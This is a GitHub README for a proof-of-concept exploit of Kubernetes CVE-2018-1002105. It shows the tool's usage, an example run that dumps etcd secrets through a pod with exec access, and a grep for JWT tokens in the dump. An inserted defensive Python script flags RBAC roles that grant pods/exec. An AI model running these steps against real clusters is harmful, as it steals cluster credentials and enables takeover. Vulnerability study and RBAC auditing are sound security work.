GitHub - evict/poc_CVE-2018-1002105: PoC for CVE-2018-1002105.

 5 years ago
source link: https://github.com/evict/poc_CVE-2018-1002105
README.md

CVE-2018-1002105 PoC

Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires create and get privileges on pods and pods/exec. If you do not know what that means, this is probably not meant for you. :)

The current PoC dumps the secrets from the default etcd-kubernetes container.
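
A defender-side check for the prerequisite stated above, as an added example that is not part of the original README or the PoC: it lists RBAC Roles and ClusterRoles that grant create or get on pods/exec. The function names and the role data are constructed for illustration; real input would be the JSON from `kubectl get roles,clusterroles -A -o json`.

```python
import json
import sys

# Constructed sample in the shape of `kubectl get roles,clusterroles -A -o json`.
SAMPLE = {"items": [
    {"kind": "Role", "metadata": {"name": "debugger", "namespace": "dev"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "pods/exec"],
                "verbs": ["get", "create"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "ops-all"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"kind": "Role", "metadata": {"name": "viewer", "namespace": "dev"},
     "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]},
    {"kind": "Role", "metadata": {"name": "scaler", "namespace": "dev"},
     "rules": [{"apiGroups": ["apps"], "resources": ["*"], "verbs": ["*"]}]},
]}

NEEDED_VERBS = {"create", "get"}  # verbs the README names as prerequisites


def _covers_pods_exec(rule):
    """True if the rule covers the pods/exec subresource in the core API group."""
    groups = rule.get("apiGroups", [])
    in_core = "" in groups or "*" in groups
    # RBAC matches a subresource by "*", the exact name, or "*/<subresource>".
    return in_core and any(
        r in ("*", "pods/exec", "*/exec") for r in rule.get("resources", []))


def exec_grants(role_list):
    """Return {role id: sorted verbs} for roles granting create/get on pods/exec."""
    findings = {}
    for item in role_list.get("items", []):
        meta = item["metadata"]
        ident = f'{item["kind"]}/{meta.get("namespace", "cluster-wide")}/{meta["name"]}'
        verbs = set()
        for rule in item.get("rules") or []:  # aggregated ClusterRoles may have null rules
            if _covers_pods_exec(rule):
                rule_verbs = set(rule.get("verbs", []))
                verbs |= NEEDED_VERBS if "*" in rule_verbs else rule_verbs & NEEDED_VERBS
        if verbs:
            findings[ident] = sorted(verbs)
    return findings


if __name__ == "__main__":
    # Pipe kubectl JSON on stdin; falls back to the constructed sample on a terminal.
    data = SAMPLE if sys.stdin.isatty() else json.load(sys.stdin)
    for ident, verbs in exec_grants(data).items():
        print(ident, verbs)
```

A flagged role only matters where a RoleBinding or ClusterRoleBinding attaches it to a subject, so review the bindings for each hit.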

Demo

The PoC in action:

asciicast

Usage

usage: poc.py [-h] --target TARGET [--jwt TOKEN] [--namespace NAMESPACE] --pod
              POD

PoC for CVE-2018-1002105.

optional arguments:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        API server target:port
  --jwt TOKEN, -j TOKEN
                        JWT token for service account
  --namespace NAMESPACE, -n NAMESPACE
                        Namespace with exec access
  --pod POD, -p POD     Pod with exec access

Example:

$ ./poc.py -t 10.0.2.15:6443 --jwt [token]
[*] Building pipe...
[+] Pipe opened :D
[*] Attempting code exec in pod
[*] Dumping secrets in etcd.db....
[+] Done dumping secrets!

Check for tokens:

$ grep -air eyJ etcd.db
